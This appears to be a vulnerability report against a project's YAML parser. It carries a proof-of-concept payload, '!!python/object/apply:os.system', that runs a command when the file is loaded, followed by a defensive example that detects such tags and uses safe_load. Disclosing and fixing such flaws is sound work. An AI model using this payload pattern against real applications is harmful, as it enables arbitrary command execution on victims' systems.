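```python
# coding=utf-8
from definitions import Parser

# Raw string so the backslashes in the Windows path are kept literally
a = Parser._load(r'C:\Users\Administrator\Desktop\simple.yaml')
# Contents of C:\Users\Administrator\Desktop\simple.yaml:
# !!python/object/apply:os.system ["calc.exe"]
```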
Hi, there is a vulnerability in the load() method in parser.py; please see the PoC above. It can execute arbitrary Python commands, resulting in command execution.
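An added example, not part of the issue or the project's code: assuming `Parser._load` hands the file to PyYAML's `yaml.load` (the loader that the `!!python/object/apply` tag targets), the sketch below lists python-specific tags without constructing any object and then loads the document through `yaml.safe_load`, which rejects the PoC. The names `python_tags` and `load_untrusted` and the benign sample are constructed for illustration.

```python
import yaml  # PyYAML (third-party); assumed to be the library behind Parser._load

# Constructed sample inputs, embedded so the example runs offline.
PAYLOAD = '!!python/object/apply:os.system ["calc.exe"]\n'  # content of the PoC file
BENIGN = "name: simple\nitems: [1, 2]\n"

PYTHON_TAG_PREFIX = "tag:yaml.org,2002:python/"


def python_tags(text):
    """Return the resolved python/* tags in a single YAML document.

    yaml.compose() only builds the node graph; no constructor runs, so the
    tagged callable is never invoked while auditing.
    """
    found, seen = [], set()
    stack = [yaml.compose(text, Loader=yaml.SafeLoader)]
    while stack:
        node = stack.pop()
        if node is None or id(node) in seen:  # empty document or aliased node
            continue
        seen.add(id(node))
        if node.tag.startswith(PYTHON_TAG_PREFIX):
            found.append(node.tag)
        if isinstance(node, yaml.SequenceNode):
            stack.extend(node.value)
        elif isinstance(node, yaml.MappingNode):
            for key, value in node.value:
                stack.extend((key, value))
    return found


def load_untrusted(text):
    """Hardened load: SafeLoader builds only plain data (dict, list, str, int, ...)."""
    try:
        return yaml.safe_load(text)
    except yaml.constructor.ConstructorError as exc:
        raise ValueError("rejected YAML tag: %s" % exc.problem) from exc


if __name__ == "__main__":
    print(python_tags(PAYLOAD))
    print(load_untrusted(BENIGN))
    try:
        load_untrusted(PAYLOAD)
    except ValueError as err:
        print(err)
```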